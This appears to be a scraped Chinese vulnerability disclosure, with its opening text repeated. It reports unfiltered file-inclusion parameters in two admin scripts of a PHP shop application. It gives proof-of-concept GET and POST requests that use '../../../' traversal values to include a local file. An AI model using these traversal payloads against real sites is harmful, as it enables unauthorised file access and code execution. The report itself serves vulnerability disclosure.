VULHUB ™

### 简要描述： 整套程序当中对于某函数未做任何过滤........导致.......你猜......... 求礼物 ### 详细说明： 第一个存在\admin\integrate.php文件中（其实还有好多，我找了两个代表的就提交了） [<img src="https://images.seebug.org/upload/201307/07001532251cfe359c4bb15a6e249bee65bff3ba.png" alt="4646464.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/07001532251cfe359c4bb15a6e249bee65bff3ba.png) code通过post提交未过滤 第二个存在\admin\shipping.php [<img src="https://images.seebug.org/upload/201307/07003453fb950198a7aa24c12826b2e1ec98dcbc.png" alt="QQ截图20130707002252.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/07003453fb950198a7aa24c12826b2e1ec98dcbc.png) code通过get提交 ### 漏洞证明： 我在根目录下有一个2.php文件内容是phpinfo url:http://127.0.0.1/ec/admin/integrate.php?act=save_uc_config post:code=..%2F..%2F..%2F2 [<img src="https://images.seebug.org/upload/201307/07002304c761719aedb294c6d0ee934c69ca194e.png" alt="QQ截图20130707002252.png" width="600"...

### 简要描述： 整套程序当中对于某函数未做任何过滤........导致.......你猜......... 求礼物 ### 详细说明： 第一个存在\admin\integrate.php文件中（其实还有好多，我找了两个代表的就提交了） [<img src="https://images.seebug.org/upload/201307/07001532251cfe359c4bb15a6e249bee65bff3ba.png" alt="4646464.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/07001532251cfe359c4bb15a6e249bee65bff3ba.png) code通过post提交未过滤 第二个存在\admin\shipping.php [<img src="https://images.seebug.org/upload/201307/07003453fb950198a7aa24c12826b2e1ec98dcbc.png" alt="QQ截图20130707002252.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/07003453fb950198a7aa24c12826b2e1ec98dcbc.png) code通过get提交 ### 漏洞证明： 我在根目录下有一个2.php文件内容是phpinfo url:http://127.0.0.1/ec/admin/integrate.php?act=save_uc_config post:code=..%2F..%2F..%2F2 [<img src="https://images.seebug.org/upload/201307/07002304c761719aedb294c6d0ee934c69ca194e.png" alt="QQ截图20130707002252.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/07002304c761719aedb294c6d0ee934c69ca194e.png) [<img src="https://images.seebug.org/upload/201307/070023151cf3fbfce8e499b6495ac8a2dc4ec5d8.png" alt="2222222222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/070023151cf3fbfce8e499b6495ac8a2dc4ec5d8.png) post提交后复制返回内容保存到一个html文件中，打开 [<img src="https://images.seebug.org/upload/201307/07002424bc465ffa8108572b90ce14772a9ede01.png" alt="2222222222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/07002424bc465ffa8108572b90ce14772a9ede01.png) ---------------------------------------------------------------------------------- get方式的是 url：http://127.0.0.1/ec/admin/shipping.php?act=install&code=../../../2 [<img src="https://images.seebug.org/upload/201307/070038493bd1c42eebac8966fd4f6488ddd98008.png" alt="2222222222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/070038493bd1c42eebac8966fd4f6488ddd98008.png)